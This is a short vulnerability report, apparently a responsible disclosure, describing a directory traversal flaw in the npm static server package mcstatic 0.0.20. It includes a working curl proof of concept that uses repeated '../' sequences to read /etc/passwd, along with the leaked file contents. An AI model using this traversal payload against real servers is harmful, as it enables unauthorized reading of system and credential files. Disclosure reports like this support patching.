I would like to report a Server Directory Traversal in mcstatic.
It allows reading local files on the target server.
module name: mcstaticversion:0.0.20npm page: https://www.npmjs.com/package/mcstatic
Static Http server for mocking and stuff
$ npm i mcstatic
$ ./node_modules/mcstatic/bin/mcstatic --port 6060
/etc/passwd
on the target server:$ curl --path-as-is 'http://127.0.0.1:6060/../../../../../../../../../etc/passwd'
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
...
reading local files on the target server